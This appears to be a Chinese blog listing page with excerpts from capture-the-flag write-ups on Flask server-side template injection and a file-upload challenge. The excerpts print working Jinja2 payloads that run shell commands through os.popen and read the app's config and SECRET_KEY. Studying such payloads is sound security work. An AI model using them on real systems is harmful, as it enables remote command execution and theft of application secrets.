SSTI
关注
分享
扫一扫
文章平均质量分 70
zbbjya
这个作者很懒,什么都没留下…
展开
-
SSTI知识点与题型
首先会出现这样的界面 ?name={{1%2b1}}hello %2b= + %2b是url编码 ?name={{1+1}}hello 执行成功说明是有模板注入 ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} 从查询的语句中看到了flag然后直接cat flag就可以得到了 ?name={{ config.__class__.__init__.__globals__['os'原创 2022-04-15 01:09:03 · 505 阅读 · 0 评论 -
## Flask_FileUpload bugku
Flask_FileUpload 查看网页源代码,然后看到文件上传的类型是只能这两种形式 jpg png 要是python可运行同时也要jpg 在写好之后将文件后缀名更改上传 上传成功但是没有flag 我试了好几次从 import os os.system(‘ls/’); 不知道为什么我还是错了我很心痛,做不出来,明天再战吧我感觉我的眼睛有点花 ...原创 2022-03-17 16:47:06 · 1534 阅读 · 0 评论 -
# BUGKU Simple_SSTI_1-2
##BUGKU Simple_SSTI_1 查看网页源代码 提示需要传一个flag参数,Flask 是一个微型的 Python 开发的 Web 框架, 由上可知flag在secret_key下,config是flask模板中的一个全局对象而使用 /?flag={{config.items()}} 读取配置文件可得到,其数据,flag也在里面 /?flag={{config.SECRET_KEY}} 可直接得到flag Simple_SSTI_2 同样提示需要传一个flag参数 查看网原创 2022-03-17 15:27:18 · 757 阅读 · 0 评论